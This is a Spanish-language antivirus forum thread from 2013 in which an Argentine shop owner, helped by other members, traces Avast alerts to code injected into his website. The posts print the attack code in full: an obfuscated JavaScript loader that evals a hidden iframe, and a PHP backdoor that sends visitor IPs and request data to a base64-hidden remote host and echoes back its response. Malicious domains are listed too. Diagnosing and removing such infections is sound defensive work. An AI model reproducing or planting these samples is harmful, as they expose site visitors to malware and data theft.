Avast WEBforum
Non-English Zone => Espanol => Topic started by: rocker84 on June 27, 2013, 04:33:01 AM
-
Hola gente, en mi web hxxp://www.fancyonline.com.ar me sale este virus:
URL: hxxp://bachmanncollege.biz/hzziuv0ORK10x...
Process: C:\Program Files (x86)\Mozilla Firefox\f...
Infection: URL:Mal
me estoy volviendo loco, a veces salta, a veces no. Un par de cliente me lo comentaron también. Baje el sitio entero, le di scan y no encuentra nada. En virustotal y en http://vscan.novirusthanks.org/ y http://sitecheck.sucuri.net/ sale que está limpio. Que estoy haciendo mal? Gracias de antemano!
-
Si piensas que es un fp envia el reporte a vast y si es asi en unos dias estara solucionado http://www.avast.com/es-es/contact-form.php
Mira estos reporte http://www.urlvoid.com/scan/bachmanncollege.biz/
http://scanurl.net/?u=http%3A%2F%2Fbachmanncollege.biz%2Fhzziuv0ORK10x&uesb=Check+This+URL#results
-
Hola gente, en mi web fancyonline.com.ar me sale este virus:
URL: http://bachmanncollege.biz/hzziuv0ORK10x (http://bachmanncollege.biz/hzziuv0ORK10x)...
Process: C:\Program Files (x86)\Mozilla Firefox\f...
Infection: URL:Mal
me estoy volviendo loco, a veces salta, a veces no. Un par de cliente me lo comentaron también. Baje el sitio entero, le di scan y no encuentra nada. En virustotal y en http://vscan.novirusthanks.org/ (http://vscan.novirusthanks.org/) y http://sitecheck.sucuri.net/ (http://sitecheck.sucuri.net/) sale que está limpio. Que estoy haciendo mal? Gracias de antemano!
Hola rocker84 y bienvenid@ al foro :)
Edita por favor tu post y modifica el enlace sustituyendo http por hxxp para evitar así que otros usuarios puedan resultar infectados.
En cuanto a lo de ser un F/P no lo creo. Lo he probado con Avast y con KAV y ambos me indican que el sitio está infectado. Seguramente es algún tipo de redirección extraña ó algún script malicioso que ha sido inyectado.
Este es el resultado de Virus total:
https://www.virustotal.com/es/url/0a6c2485796a59638222c27f00c9b446eccafb431508c8f4a5edfcb6772057ea/analysis/1372355741/ (https://www.virustotal.com/es/url/0a6c2485796a59638222c27f00c9b446eccafb431508c8f4a5edfcb6772057ea/analysis/1372355741/)
Los principales antivirus lo detectan como amenaza por lo que para mi no es un F/P.
No olvides modificar el enlace por favor para evitar que otros usuarios se infecten.. Gracias :)
Adjunto captura de pantalla en un equipo con KIS instalado para que veas que no sólo Avast lo detecta como amenaza....
Saludos!
AÑADIDO:
Lo más seguro es que en algun archivo de tu sitio web (fancyonline.xcom) se está redirigiendo el navegador a la otra URL (hxxp://bachmanncollege.biz/hzziuv0ORK10x...) que es la que está infectada y añadida a la base de datos de varios antivirus como "insegura e infectada". Yo descargaría tu sitio web completo y revisaría que no haya ningún script "extraño" en la web. Si no sabes cómo hacerlo deberías pedir ayuda a tu proveedor de hosting para que lo revisen..
Fancyonline sale limpio en VT. (https://www.virustotal.com/es/url/51d54cbc3909813332be173a239b0954d8c354209d91f22d804b98d0070ec367/analysis/1372356118 (https://www.virustotal.com/es/url/51d54cbc3909813332be173a239b0954d8c354209d91f22d804b98d0070ec367/analysis/1372356118/))
En este foro lo más que podemos hacer es decir que reportes tu web como un F/P pero en mi opinión no lo es.. Asegúrate antes y cuando tengas la certeza al 100% de que tu sitio está limpio entonces reportalo como F/P.
Saludos y siento no poder ayudarte más..
-
muchas gracias por las respuestas, ahi corregí el hxxp por las dudas, disculpas no me había dado cuenta
escanie el sitio completo bajado, con el avast, y salió limpio, lo mismo con mysql y no había links raros tampoco. Busque cada http:// en todo el código en todas los php y nada raro...
ahora recién me meto a mi web fancyonline y no saltó nada con el avast, ni en chrome, ni en firefox, ni en ie....
puede ser que quede en la memoria y no avise más?? sino magicamente se borró? o solucionaron justo el error en la base del avast?
a alguien le salta el virus?
Gracias!
-
Rocker84
Lo siento tu pagina me alerto: URL:MAL ver imagen
....Lo más seguro es que en algun archivo de tu sitio web (fancyonline.xcom) se está redirigiendo el navegador a la otra URL (hxxp://bachmanncollege.biz/hzziuv0ORK10x...) que es la que está infectada y añadida a la base de datos de varios antivirus como "insegura e infectada".
Estoy de acuerdo. La alerta que Avast! me tiro pertenece a otro sitio web que la alerta pasada. Tienes un redirector en algun lado tienes que encontrarlo.
-
Re: https://www.virustotal.com/nl/url/3f483668b95d19658287be467c18ac57bf66804a6845fabb3e4972518e361cb5/analysis/
URL subjected to threat Mal/HTMLGen-A.
Re: http://scanurl.net/?u=http%3A%2F%2Fbachmanncollege.biz&uesb=Check+This+URL#results
Site blacklisted: http://www.surbl.org/lists
Taken down: Unable to properly scan your site. Site empty (no content).
*Cached results from 48 hrs ago. address is unreachable
For IP -> https://www.virustotal.com/nl/ip-address/31.44.184.62/information/
polonus
-
Hi Polonus.
Thanks for your input. One question though. Is it hxxp://www.fancyonline.com.ar redirecting to those sites because.... What ? That is what the OP wants to know. The million $ question ;)
-
ahi me saltò de nuevo el aviso de virus, cambiò la redirecciòn a hxxp://protectionacross.biz, el còdigo infiltrado que figura en el navegador es el siguiente, todavìa no lo encuentro en los php, es como que se activa a veces y a vaces no...no me va a ganar........ :-\
el problema es que no se què buscar...
el html generado empieza asi con la script sospechosa:
<script>ss=String;ps="sp"+"l"+"i"+"t";asd=function(){++d.body};a=("15,15,155,152,44,54,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,55,177,21,15,15,15,155,152,166,145,161,151,166,54,55,77,21,15,15,201,44,151,160,167,151,44,177,21,15,15,15,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,46,100,155,152,166,145,161,151,44,167,166,147,101,53,154,170,170,164,76,63,63,164,166,163,170,151,147,170,155,163,162,167,145,147,166,163,167,167,62,146,155,176,63,123,161,120,107,172,147,64,156,111,175,113,64,113,122,176,126,64,151,70,156,127,65,72,176,170,111,64,67,75,160,74,64,75,70,130,71,64,166,72,163,171,64,146,117,113,170,64,162,125,113,172,64,124,134,146,117,64,105,130,116,106,64,74,147,66,154,63,53,44,173,155,150,170,154,101,53,65,64,64,53,44,154,151,155,153,154,170,101,53,65,64,64,53,44,167,170,175,160,151,101,53,173,155,150,170,154,76,65,64,64,164,174,77,154,151,155,153,154,170,76,65,64,64,164,174,77,164,163,167,155,170,155,163,162,76,145,146,167,163,160,171,170,151,77,160,151,152,170,76,61,65,64,64,64,64,164,174,77,170,163,164,76,64,77,53,102,100,63,155,152,166,145,161,151,102,46,55,77,21,15,15,201,21,15,15,152,171,162,147,170,155,163,162,44,155,152,166,145,161,151,166,54,55,177,21,15,15,15,172,145,166,44,152,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,167,166,147,53,60,53,154,170,170,164,76,63,63,164,166,163,170,151,147,170,155,163,162,167,145,147,166,163,167,167,62,146,155,176,63,123,161,120,107,172,147,64,156,111,175,113,64,113,122,176,126,64,151,70,156,127,65,72,176,170,111,64,67,75,160,74,64,75,70,130,71,64,166,72,163,171,64,146,117,113,170,64,162,125,113,172,64,124,134,146,117,64,105,130,116,106,64,74,147,66,154,63,53,55,77,152,62,167,170,175,160,151,62,160,151,152,170,101,53,61,65,64,64,64,64,164,174,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,101,53,145,146,167,163,160,171,170,151,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,173,155,150,170,154,53,60,53,65,64,64,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,154,151,155,153,154,170,53,60,53,65,64,64,53,55,77,21,15,15,15,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,62,145,164,164,151,162,150,107,154,155,160,150,54,152,55,77,21,15,15,201"[ps](","));d=document;for(i=0;i<a.length;i+=1){a=-(10-6)+parseInt(a,8);}try{asd()}catch(q){yy=50-50;}try{yy/=2}catch(q){yy=1;}if(!yy)eval(ss["fr"+"omCharCode"].apply(ss,a));</script><!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="LTR" lang="es">
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-xxxxxx-1']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
-
¿ Ya lo reportastes como F/P ? http://www.avast.com/es-es/contact-form.php?loadStyles
¿ Te contestaron algo ? Avast! puede que te diga que pasa en la respuesta.
El problema reside en que tu sitio como tal esta limpio pero te lleva a todo estos sitios que estan en lista negra. Voy a pedirle a !Donovan (http://forum.avast.com/index.php?action=profile;u=72314) , nuestro guru en scripting code, que le eche una mirada a tu sitio a ver si consigue algo, pero puede que no tengas constentacion hasta mañana o pasado. Cruza los dedos.
-
¿ Ya lo reportastes como F/P ? http://www.avast.com/es-es/contact-form.php?loadStyles
¿ Te contestaron algo ? Avast! puede que te diga que pasa en la respuesta.
El problema reside en que tu sitio como tal esta limpio pero te lleva a todo estos sitios que estan en lista negra. Voy a pedirle a !Donovan (http://forum.avast.com/index.php?action=profile;u=72314) , nuestro guru en scripting code, que le eche una mirada a tu sitio a ver si consigue algo, pero puede que no tengas constentacion hasta mañana o pasado. Cruza los dedos.
no, no lo reporte como FP ya que claramente es un virus, ese còdigo no lo genera oscommerce. Algo ahi hay, estoy sospechando seriamente que sea algo en el servidor y por ende se ejecuta en mi web tambièn, no se si es posible. En el proveedor de hosting me dicen que el problema es en mi web, que elimine esa primera linea del còdigo html.
Gracias por la mano que me estàn dando!
-
Aunque sea obvio que tiene alguna infeccion, Avast! puede darte una explicacion de lo que esta detectando y asi hacerlo mas facil para ti buscar la causa. Ya le mande un mensage a !Donovan este chamo se las trae a la hora de analizar sitios web. Veamos si encuentra algo.
No, de nada. Para eso es un foro. Tratar de ayudarnos y aprender. Suerte
-
lo encontre!!!!!!!!!! ;D ;D ;D
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA=').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
-
;D ;D ;)
¡ El que persevera alcanza ! De todas formas dejare que !Donovan lo vea.
-
;D ;D ;)
¡ El que persevera alcanza ! De todas formas dejare que !Donovan lo vea.
asì es, nunca rendirse, muchas gracias
ahora voy a ver como fue que entrò ese còdigo ahi.... :)
-
ahi decodifiqué con php la cadena larga de letras.....
hxxp://pubbotstatistic.com/statC/stat.php
habría que mandarles el fbi o algo.... >:(
-
ahi decodifiqué con php la cadena larga de letras.....
hxxp://pubbotstatistic.com/statC/stat.php
habría que mandarles el fbi o algo.... >:(
¿ Que es el fbi ? ¿ Todavia te sale la alerta de Avast! ?
-
�ƔD���X��&��(( => Esa URL está limpia amigo ;)
Está codificada utilizando la función base64 nativa porque se suele utilizar este tipo de funciones para tratar cadenas largas como urls, emails, etc y también para ocultar redirecciones sin el conocimiento/consentimiento del usuario..
El caso es que acabo de revisar el enlace y sale limpio. El enlace que a mi me salía era el que aparece en la captura pero está caído...
Si quieres un consejo, revisa en todos los scripts php cadenas codificadas en base64, decodifícalas de nuevo y compruébalas en virustotal.
Por cierto, tu proveedor de hosting no se puede lavar las manos con este asunto. Cierto es que los archivos son responsabilidad tuya pero un proveedor "serio" te echaría una mano sobre todo si eres cliente suyo y les estás pagando...
Saludos y suerte! :)
-
¿ Que es el fbi ? ¿ Todavia te sale la alerta de Avast! ?
@Iroc955:
La Oficina Federal de Investigación o en inglés: Federal Bureau of Investigation, FBI) es la principal rama de investigación del Departamento de Justicia de los Estados Unidos. Son la policia federal que sale en las películas, esos tan chulos que van de chaqueta y corbata! ;)
Es una expresión que significa que el que hizo eso es tan listo que debería alertarse al FBI para que sus expertos en informática lo investiguen y que el FBI les detenga! ;D
-
Hola Populos.
Ni en un millon de años habria dado con ello. Yo lo conosco como FBI y no como fbi ;). ¿ Y estando en Argentina todavia puedes denunciarlo al FBI :o
Saludos.
-
por suerte ya no aparece virus en mi web con Avast.
El código estaba pegado en todos los index.php de mi sitio.
Buscando el enlace con http://urlquery.net/report.php?id=3501010
parece que usan otro dominio adicional para infectar, siempre con el mismo php (desde rusia por cierto):
hxxp://mbrowserstats.com/statE/stat.php
hxxp://mbrowserstats.com/statH/stat.php
lo raro es que al visitar esas webs figuran como inexistentes
parece que no soy el único con este problema:
https://www.google.com.ar/search?q=aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA&oq=aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA&aqs=chrome.0.57j62l3.697j0&sourceid=chrome&ie=UTF-8#sclient=psy-ab&q=ip%3D'.urlencode(%24_SERVER%5B'REMOTE_ADDR'%5D).'%26useragent%3D'.urlencode(%24sUserAgent).'%26domainname%3D'.urlencode(%24_SERVER%5B'HTTP_HOST'%5D).'%26fullpath%3D'.urlencode(%24_SERVER%5B'REQUEST_URI'%5D).'%26check%3D'.isset(%24_GET%5B'look'%5D)%3B&oq=ip%3D'.urlencode(%24_SERVER%5B'REMOTE_ADDR'%5D).'%26useragent%3D'.urlencode(%24sUserAgent).'%26domainname%3D'.urlencode(%24_SERVER%5B'HTTP_HOST'%5D).'%26fullpath%3D'.urlencode(%24_SERVER%5B'REQUEST_URI'%5D).'%26check%3D'.isset(%24_GET%5B'look'%5D)%3B&gs_l=serp.3...273180.273924.0.274522.1.1.0.0.0.0.0.0..0.0...0.1.0..1c.1.17.psy-ab.WxThCvQO6Kg&pbx=1&bav=on.2,or.r_qf.&bvm=bv.48705608,d.dmQ&fp=8983eccdabb72f71&biw=1600&bih=785 (https://www.google.com.ar/search?q=aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA&oq=aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA&aqs=chrome.0.57j62l3.697j0&sourceid=chrome&ie=UTF-8#sclient=psy-ab&q=ip%3D'.urlencode(%24_SERVER%5B'REMOTE_ADDR'%5D).'%26useragent%3D'.urlencode(%24sUserAgent).'%26domainname%3D'.urlencode(%24_SERVER%5B'HTTP_HOST'%5D).'%26fullpath%3D'.urlencode(%24_SERVER%5B'REQUEST_URI'%5D).'%26check%3D'.isset(%24_GET%5B'look'%5D)%3B&oq=ip%3D'.urlencode(%24_SERVER%5B'REMOTE_ADDR'%5D).'%26useragent%3D'.urlencode(%24sUserAgent).'%26domainname%3D'.urlencode(%24_SERVER%5B'HTTP_HOST'%5D).'%26fullpath%3D'.urlencode(%24_SERVER%5B'REQUEST_URI'%5D).'%26check%3D'.isset(%24_GET%5B'look'%5D)%3B&gs_l=serp.3...273180.273924.0.274522.1.1.0.0.0.0.0.0..0.0...0.1.0..1c.1.17.psy-ab.WxThCvQO6Kg&pbx=1&bav=on.2,or.r_qf.&bvm=bv.48705608,d.dmQ&fp=8983eccdabb72f71&biw=1600&bih=785)
Por cierto en número de cuenta de google es UA-306980-37, por si el FBi pasa por acá ;D
Gracias nuevamente a todos por ayudarme! Saludos!
-
Gracias nuevamente a todos por ayudarme! Saludos!
Hey, nosotros no hicimos nada. Tu lo arreglastes todo. Gracias por reportar como lo hicistes.
Saludos
-
Hola Populos.
Ni en un millon de años habria dado con ello. Yo lo conosco como FBI y no como fbi ;). ¿ Y estando en Argentina todavia puedes denunciarlo al FBI :o
Saludos.
Ok! ;D
En el caso de Argentina... lo tiene un poco difícil! ;D
-
Hola Populos.
Ni en un millon de años habria dado con ello. Yo lo conosco como FBI y no como fbi ;). ¿ Y estando en Argentina todavia puedes denunciarlo al FBI :o
Saludos.
Ok! ;D
En el caso de Argentina... lo tiene un poco difícil! ;D
-Hola, que tal Sr Policía, vengo a denunciar un caso de Phishing
-ehhh?? Que es eso?
-es cuando a través de un virus te roban información personal y luego cometen actos delictivos a tus cuentas o a terceros.
-pero....hay alguien lastimado?
-no...no creo, es todo virtual
-entonces no podés hacer la denuncia
-Como que no? es como un robo pero virtualmente
-Bueno si querés, sentate allá y espera al Detective Noexiste de la subdivisión de delitos pelotudos
-Pero pero....es una joda??
-Siguiente!!
(http://beyondavatars.com/data/thumbnails/95/th_th3typewriter8nx.gif)
-
Cruel pero verdadero. Nuestros paises en SA necesitan mas y mejores leyes en Informatica, pero lo veo lejos, cuando ves en nuestras esquinas, mercados libres, y autopistas durante el trafico, gente vendiendo libremente copias piratas de musica, peliculas y programas. Y no queremos que no llamen paises tercer mundista >:(